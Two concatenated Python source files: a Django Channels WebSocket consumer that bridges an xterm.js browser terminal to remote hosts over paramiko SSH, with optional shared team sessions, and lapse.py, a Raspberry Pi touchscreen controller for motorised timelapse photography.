self.ssh_channel.resize_pty(width=cols, height=rows)
class WebsshConsumer(WebsocketConsumer):
"""
1、xterm.js 在浏览器端模拟 shell 终端, 监听用户输入通过 websocket 将用户输入的内容上传到 django
2、django 接受到用户上传的内容, 将用户在前端页面输入的内容通过 paramiko 建立的 ssh 通道上传到远程服务器执行
3、paramiko 将远程服务器的处理结果返回给 django
4、django 将 paramiko 返回的结果通过 websocket 返回给用户
5、xterm.js 接收 django 返回的数据并将其写入前端页面
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.host_id = ''
self.simple_user = ''
self.is_team = False
self.team_name = ''
def connect(self):
"""
建立WebSocket连接,并实例化SSHBridge类,在这个对象中建立SSH连接,放在 self.ssh_channel 通道中
:return:
"""
self.host_id = self.scope['url_route']['kwargs'].get('host_id')
# 获取session中的值
self.simple_user = self.scope["user"].username
# print('【Web --websocket--> WS】建立WebSocket通道,当前连接用户:', self.simple_user)
host_obj = Host.objects.get(id=self.host_id)
self.accept()
        # Once the WebSocket is up, open the SSH connection
query_string = self.scope.get('query_string')
ws_args = QueryDict(query_string=query_string, encoding='utf-8')
# # print(ws_args)
# <QueryDict: {'user': ['admin'], 'host': ['192.168.96.20'], 'port': ['22'], 'auth': ['pwd'], 'pwd': ['ZGphbmdvYWRtaW4='], 'key': [''], 'width': ['113'], 'height': ['43']}>
        # Decide from the query parameters whether this is a collaborative (team) session
team = ws_args.get('team')
if team:
self.is_team = True
self.team_name = "team_{}".format(self.host_id) # 加到这个通道组
async_to_sync(self.channel_layer.group_add)(
self.team_name,
self.channel_name
)
            # Notify everyone in the group that a user has connected
            self.send_message_or_team(json.dumps(
                {'flag': 'user', 'message': 'User {} connected to this terminal'.format(self.simple_user)}))
width = ws_args.get('width')
height = ws_args.get('height')
width = int(width)
        height = int(height)  # paramiko requires int: "required argument is an integer"
ssh_connect_dict = {}
user = self.simple_user
host = host_obj.ip
port = host_obj.ssh_port
port = int(port)
auth = host_obj.ssh_user
pwd = host_obj.ssh_passwd
# if pwd:
# pwd = base64.b64decode(pwd).decode('utf-8')
sshkey_filename_path = host_obj.ssh_key.ssh_key.path if host_obj.ssh_key else None
ssh_connect_dict = {
'host': host,
'user': auth,
'port': port,
'timeout': 30,
'pty_width': width,
'pty_height': height,
'pwd': pwd
}
if sshkey_filename_path:
if not os.path.exists(sshkey_filename_path):
self.send(json.dumps(
                    {'flag': 'error', 'message': 'Key file does not exist'}))
else:
try:
f = open(sshkey_filename_path, 'r', encoding='utf-8')
key = f.read()
string_io = StringIO()
string_io.write(key)
string_io.flush()
string_io.seek(0)
ssh_connect_dict['key'] = string_io
                    # os.remove(sshkey_filename_path)  # Delete the key file after use
                except BaseException as e:
                    # print('Error opening the key file:', e)
                    pass
        # Establish the SSH connection
        self.ssh = SSHBridge(websocket=self, simpleuser=self.simple_user)
        # print('[WS --SSHBridge--> SSH] SSH connection parameters:', ssh_connect_dict)
self.ssh.connect(**ssh_connect_dict)
def disconnect(self, close_code):
        # Tear down the connection
        # print('User {} disconnected from the WebSocket; closing the SSH connection'.format(self.simple_user))
try:
if self.is_team:
                # Notify everyone in the group that a user has disconnected
                self.send_message_or_team(json.dumps(
                    {'flag': 'user', 'message': 'User {} disconnected from this terminal'.format(self.simple_user)}))
                # Leave the group
async_to_sync(self.channel_layer.group_discard)(
self.team_name,
self.channel_name
)
self.ssh.close()
except BaseException as e:
pass
def receive(self, text_data=None, bytes_data=None):
        # Receive a message from the WebSocket
        text_data = json.loads(text_data)  # JSON string -> dict
        # print('\n\n[Web --websocket--> WS] Keystrokes from the web terminal, received over the WebSocket:', text_data)
if type(text_data) == dict:
if text_data.get('flag') == 'entered_key':
                # Get the key value typed on the front end and pass it to the shell
                data = text_data.get('entered_key', '')
                # print('[WS --SSHBridge--> Func] Forwarding from the WebSocket to SSHBridge:', text_data)
self.ssh.shell(data=data)
else:
cols = text_data['cols']
rows = text_data['rows']
                # Resize the terminal in the SSH channel
self.ssh.resize_pty(cols=cols, rows=rows)
else:
            # print('[!!!] Received data is not a dict')
pass
def send_message_or_team(self, message):
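        """In team mode, broadcast to the channel group; otherwise send only to this socket."""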
if self.is_team:
async_to_sync(self.channel_layer.group_send)(
self.team_name,
{
'type': 'team_message',
'message': message
}
)
else:
self.send(message)
def team_message(self, event):
message = event['message']
        # Send the message to this WebSocket
self.send(message)
|
lapse.py
|
# Lapse-Pi timelapse controller for Raspberry Pi
# This must run as root (sudo python lapse.py) due to framebuffer, etc.
#
# http://www.adafruit.com/products/998 (Raspberry Pi Model B)
# http://www.adafruit.com/products/1601 (PiTFT Mini Kit)
#
# Prerequisite tutorials: aside from the basic Raspbian setup and PiTFT setup
# http://learn.adafruit.com/adafruit-pitft-28-inch-resistive-touchscreen-display-raspberry-pi
#
# lapse.py by David Hunt (dave@davidhunt.ie)
# based on cam.py by Phil Burgess / Paint Your Dragon for Adafruit Industries.
# BSD license, all text above must be included in any redistribution.
import wiringpi2
import atexit
import cPickle as pickle
import errno
import fnmatch
import io
import os
import pygame
import threading
from pygame.locals import *
from subprocess import call
from time import sleep
from datetime import datetime, timedelta
# UI classes ---------------------------------------------------------------
# Icon is a very simple bitmap class, just associates a name and a pygame
# image (PNG loaded from icons directory) for each.
# There isn't a globally-declared fixed list of Icons. Instead, the list
# is populated at runtime from the contents of the 'icons' directory.
class Icon:
def __init__(self, name):
self.name = name
try:
self.bitmap = pygame.image.load(iconPath + '/' + name + '.png')
except:
pass
# Button is a simple tappable screen region. Each has:
# - bounding rect ((X,Y,W,H) in pixels)
# - optional background color and/or Icon (or None), always centered
# - optional foreground Icon, always centered
# - optional single callback function
# - optional single value passed to callback
# Occasionally Buttons are used as a convenience for positioning Icons
# but the taps are ignored. Stacking order is important; when Buttons
# overlap, lowest/first Button in list takes precedence when processing
# input, and highest/last Button is drawn atop prior Button(s). This is
# used, for example, to center an Icon by creating a passive Button the
# width of the full screen, but with other buttons left or right that
# may take input precedence (e.g. the Effect labels & buttons).
# After Icons are loaded at runtime, a pass is made through the global
# buttons[] list to assign the Icon objects (from names) to each Button.
class Button:
def __init__(self, rect, **kwargs):
self.rect = rect # Bounds
self.color = None # Background fill color, if any
self.iconBg = None # Background Icon (atop color fill)
self.iconFg = None # Foreground Icon (atop background)
self.bg = None # Background Icon name
self.fg = None # Foreground Icon name
self.callback = None # Callback function
self.value = None # Value passed to callback
for key, value in kwargs.iteritems():
if key == 'color': self.color = value
elif key == 'bg' : self.bg = value
elif key == 'fg' : self.fg = value
elif key == 'cb' : self.callback = value
elif key == 'value': self.value = value
def selected(self, pos):
x1 = self.rect[0]
y1 = self.rect[1]
x2 = x1 + self.rect[2] - 1
y2 = y1 + self.rect[3] - 1
if ((pos[0] >= x1) and (pos[0] <= x2) and
(pos[1] >= y1) and (pos[1] <= y2)):
if self.callback:
if self.value is None: self.callback()
else: self.callback(self.value)
return True
return False
def draw(self, screen):
if self.color:
screen.fill(self.color, self.rect)
if self.iconBg:
screen.blit(self.iconBg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconBg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconBg.bitmap.get_height())/2))
if self.iconFg:
screen.blit(self.iconFg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconFg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconFg.bitmap.get_height())/2))
def setBg(self, name):
if name is None:
self.iconBg = None
else:
for i in icons:
if name == i.name:
self.iconBg = i
break
# UI callbacks -------------------------------------------------------------
# These are defined before globals because they're referenced by items in
# the global buttons[] list.
def motorCallback(n): # Pass 1 (forward) or 2 (reverse) to toggle the motor
global screenMode
global motorRunning
global motorDirection
global motorpin
global motorpinA
global motorpinB
if n == 1:
motorDirection = 1
motorpin = motorpinA
if motorRunning == 0:
motorRunning = 1
gpio.digitalWrite(motorpin,gpio.HIGH)
else:
motorRunning = 0
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
elif n == 2:
motorDirection = 0
motorpin = motorpinB
if motorRunning == 0:
motorRunning = 1
gpio.digitalWrite(motorpin,gpio.HIGH)
else:
motorRunning = 0
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
def numericCallback(n): # Pass 0-9 (digit), 10 (delete), 11 (cancel) or 12 (OK)
global screenMode
global numberstring
if n < 10:
numberstring = numberstring + str(n)
elif n == 10:
numberstring = numberstring[:-1]
elif n == 11:
screenMode = 1
elif n == 12:
screenMode = returnScreen
numeric = int(numberstring)
v[dict_idx] = numeric
def settingCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
screenMode += n
if screenMode < 1: screenMode = len(buttons) - 1
elif screenMode >= len(buttons): screenMode = 1
def valuesCallback(n): # Pass 1-3 to edit a value, or -1 to save and exit
global screenMode
global returnScreen
global numberstring
global numeric
global v
global dict_idx
if n == -1:
screenMode = 0
saveSettings()
if n == 1:
dict_idx='Pulse'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
elif n == 2:
dict_idx='Interval'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
elif n == 3:
dict_idx='Images'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
def viewCallback(n): # Viewfinder buttons
global screenMode, screenModePrior
if n is 0: # Gear icon
screenMode = 1
def doneCallback(): # Exit settings
global screenMode
if screenMode > 0:
saveSettings()
screenMode = 0 # Switch back to main window
def startCallback(n): # Start (n=1) or stop (n=0) the timelapse thread
global t, busy, threadExited
global currentframe
if n == 1:
if busy == False:
if (threadExited == True):
# Re-instanciate the object for the next start
t = threading.Thread(target=timeLapse)
threadExited = False
t.start()
if n == 0:
if busy == True:
busy = False
t.join()
currentframe = 0
# Re-instanciate the object for the next time around.
t = threading.Thread(target=timeLapse)
def quitCallback(): # Quit confirmation button
raise SystemExit
def offCallback(): # Turn Off Rasp
os.system("sudo halt")
raise SystemExit
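# timeLapse() runs in its own thread: for each frame it pulses the motor for
# v['Pulse'] ms, waits settling_time for the rig to stop moving, switches off the
# PiTFT backlight, holds the shutter pin high for shutter_length seconds, restores
# the backlight, then sleeps out the rest of v['Interval'] before the next frame.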
def timeLapse():
global v
global settling_time
global shutter_length
global motorpin
global shutterpin
global backlightpin
global busy, threadExited
global currentframe
busy = True
for i in range( 1 , v['Images'] + 1 ):
if busy == False:
break
currentframe = i
gpio.digitalWrite(motorpin,gpio.HIGH)
pulse = float(v['Pulse'])/1000.0
sleep(pulse)
gpio.digitalWrite(motorpin,gpio.LOW)
sleep(settling_time)
# disable the backlight, critical for night timelapses, also saves power
os.system("echo '0' > /sys/class/gpio/gpio252/value")
gpio.digitalWrite(shutterpin,gpio.HIGH)
sleep(shutter_length)
gpio.digitalWrite(shutterpin,gpio.LOW)
# enable the backlight
os.system("echo '1' > /sys/class/gpio/gpio252/value")
interval = float(v['Interval'])/1000.0
if (interval > shutter_length):
sleep(interval - shutter_length)
currentframe = 0
busy = False
threadExited = True
# Global stuff -------------------------------------------------------------
t = threading.Thread(target=timeLapse)
busy = False
threadExited = False
screenMode = 0 # Current screen mode; default = viewfinder
screenModePrior = -1 # Prior screen mode (for detecting changes)
iconPath = 'icons' # Subdirectory containing UI bitmaps (PNG format)
numeric = 0 # number from numeric keypad
numberstring = "0"
motorRunning = 0
motorDirection = 0
returnScreen = 0
shutterpin = 17
motorpinA = 18
motorpinB = 27
motorpin = motorpinA
backlightpin = 252
currentframe = 0
framecount = 100
settling_time = 0.2
shutter_length = 0.2
interval_delay = 0.2
dict_idx = "Interval"
v = { "Pulse": 100,
"Interval": 3000,
"Images": 150}
icons = [] # This list gets populated at startup
# buttons[] is a list of lists; each top-level list element corresponds
# to one screen mode (e.g. viewfinder, image playback, storage settings),
# and each element within those lists corresponds to one UI button.
# There's a little bit of repetition (e.g. prev/next buttons are
# declared for each settings screen, rather than a single reusable
# set); trying to reuse those few elements just made for an ugly
# tangle of code elsewhere.
buttons = [
# Screen mode 0 is main view screen of current status
[Button(( 4,180,60, 60), bg='start', cb=startCallback, value=1),
Button((67,180, 60, 60), bg='cog', cb=viewCallback, value=0),
Button((130,180,60, 60), bg='stop', cb=startCallback, value=0),
Button((193,180,60, 60), bg='quit', cb=quitCallback),
Button((256,180,60, 60), bg='off', cb=offCallback)],
# Screen 1 for changing values and setting motor direction
[Button((260, 0, 60, 60), bg='cog', cb=valuesCallback, value=1),
Button((260, 60, 60, 60), bg='cog', cb=valuesCallback, value=2),
Button((260,120, 60, 60), bg='cog', cb=valuesCallback, value=3),
Button(( 0,180,160, 60), bg='ok', cb=valuesCallback, value=-1),
Button((160,180, 70, 60), bg='left', cb=motorCallback, value=1),
Button((230,180, 70, 60), bg='right', cb=motorCallback, value=2)],
# Screen 2 for numeric input
[Button(( 0, 0,320, 60), bg='box'),
Button((180,120, 60, 60), bg='0', cb=numericCallback, value=0),
Button(( 0,180, 60, 60), bg='1', cb=numericCallback, value=1),
Button((120,180, 60, 60), bg='3', cb=numericCallback, value=3),
Button(( 60,180, 60, 60), bg='2', cb=numericCallback, value=2),
Button(( 0,120, 60, 60), bg='4', cb=numericCallback, value=4),
Button(( 60,120, 60, 60), bg='5', cb=numericCallback, value=5),
Button((120,120, 60, 60), bg='6', cb=numericCallback, value=6),
Button(( 0, 60, 60, 60), bg='7', cb=numericCallback, value=7),
Button(( 60, 60, 60, 60), bg='8', cb=numericCallback, value=8),
Button((120, 60, 60, 60), bg='9', cb=numericCallback, value=9),
Button((240,120, 80, 60), bg='del', cb=numericCallback, value=10),
Button((180,180,140, 60), bg='ok', cb=numericCallback, value=12),
Button((180, 60,140, 60), bg='cancel',cb=numericCallback, value=11)]
]
# Assorted utility functions -----------------------------------------------
def saveSettings():
global v
try:
outfile = open('lapse.pkl', 'wb')
# Use a dictionary (rather than pickling 'raw' values) so
# the number & order of things can change without breaking.
pickle.dump(v, outfile)
outfile.close()
except:
pass
def loadSettings():
global v
try:
infile = open('lapse.pkl', 'rb')
v = pickle.load(infile)
infile.close()
except:
pass
# Initialization -----------------------------------------------------------
# Init framebuffer/touchscreen environment variables
os.putenv('SDL_VIDEODRIVER', 'fbcon')
os.putenv('SDL_FBDEV' , '/dev/fb1')
os.putenv('SDL_MOUSEDRV' , 'TSLIB')
os.putenv('SDL_MOUSEDEV' , '/dev/input/touchscreen')
# Init pygame and screen
print "Initting..."
pygame.init()
print "Setting Mouse invisible..."
pygame.mouse.set_visible(False)
print "Setting fullscreen..."
modes = pygame.display.list_modes(16)
screen = pygame.display.set_mode(modes[0], FULLSCREEN, 16)
print "Loading Icons..."
# Load all icons at startup.
for file in os.listdir(iconPath):
if fnmatch.fnmatch(file, '*.png'):
icons.append(Icon(file.split('.')[0]))
# Assign Icons to Buttons, now that they're loaded
print"Assigning Buttons"
for s in buttons: # For each screenful of buttons...
for b in s: # For each button on screen...
for i in icons: # For each icon...
if b.bg == i.name: # Compare names; match?
b.iconBg = i # Assign Icon to Button
b.bg = None # Name no longer used; allow garbage collection
if b.fg == i.name:
b.iconFg = i
b.fg = None
# Set up GPIO pins
print "Init GPIO pins..."
gpio = wiringpi2.GPIO(wiringpi2.GPIO.WPI_MODE_GPIO)
gpio.pinMode(shutterpin,gpio.OUTPUT)
gpio.pinMode(motorpinA,gpio.OUTPUT)
gpio.pinMode(motorpinB,gpio.OUTPUT)
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
# I couldn't seem to get at pin 252 for the backlight using the usual method above,
# but this seems to work
os.system("echo 252 > /sys/class/gpio/export")
os.system("echo 'out' > /sys/class/gpio/gpio252/direction")
os.system("echo '1' > /sys/class/gpio/gpio252/value")
print"Load Settings"
loadSettings() # Must come last; fiddles with Button/Icon states
print "loading background.."
img = pygame.image.load("icons/LapsePi.png")
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((320 - img.get_width() ) / 2,
(240 - img.get_height()) / 2))
pygame.display.update()
sleep(2)
# Main loop ----------------------------------------------------------------
print "mainloop.."
while(True):
# Process touchscreen input
while True:
for event in pygame.event.get():
if(event.type is MOUSEBUTTONDOWN):
pos = pygame.mouse.get_pos()
for b in buttons[screenMode]:
if b.selected(pos): break
elif(event.type is MOUSEBUTTONUP):
motorRunning = 0
gpio.digitalWrite(motorpinA,gpio.LOW)
gpio.digitalWrite(motorpinB,gpio.LOW)
if screenMode >= 0 or screenMode != screenModePrior: break
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((320 - img.get_width() ) / 2,
(240 - img.get_height()) / 2))
# Overlay buttons on display and update
for i,b in enumerate(buttons[screenMode]):
b.draw(screen)
if screenMode == 2:
myfont = pygame.font.SysFont("Arial", 40)
label = myfont.render(numberstring, 1, (255,255,255))
screen.blit(label, (10, 2))
if screenMode == 1:
myfont = pygame.font.SysFont("Arial", 20)
label = myfont.render("Pulse:" , 1, (255,255,255))
screen.blit(label, (10, 10))
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 70))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Pulse']) + "ms" , 1, (255,255,255))
screen.blit(label, (130, 10))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (130, 70))
label = myfont.render(str(v['Images']) , 1, (255,255,255))
screen.blit(label, (130,130))
if screenMode == 0:
myfont = pygame.font.SysFont("Arial", 20)
label = myfont.render("Pulse:" , 1, (255,255,255))
screen.blit(label, (10, 10))
label = myfont.render("Interval:" , 1, (255,255,255))
screen.blit(label, (10, 50))
label = myfont.render("Frames:" , 1, (255,255,255))
screen.blit(label, (10, 90))
label = myfont.render("Remaining:" , 1, (255,255,255))
screen.blit(label, (10,130))
label = myfont.render(str(v['Pulse']) + "ms" , 1, (255,255,255))
screen.blit(label, (160, 10))
label = myfont.render(str(v['Interval']) + "ms" , 1, (255,255,255))
screen.blit(label, (160, 50))
label = myfont.render(str(currentframe) + " of " + str(v['Images']) , 1, (255,255,255))
screen.blit(label, (160, 90))
intervalLength = float((v['Pulse'] + v['Interval'] + (settling_time*1000) + (shutter_length*1000)))
remaining = float((intervalLength * (v['Images'] - currentframe)) / 1000)
sec = timedelta(seconds=int(remaining))
d = datetime(1,1,1) + sec
remainingStr = "%dh%dm%ds" % (d.hour, d.minute, d.second)
label = myfont.render(remainingStr , 1, (255,255,255))
screen.blit(label, (160, 130))
pygame.display.update()
screenModePrior = screenMode
|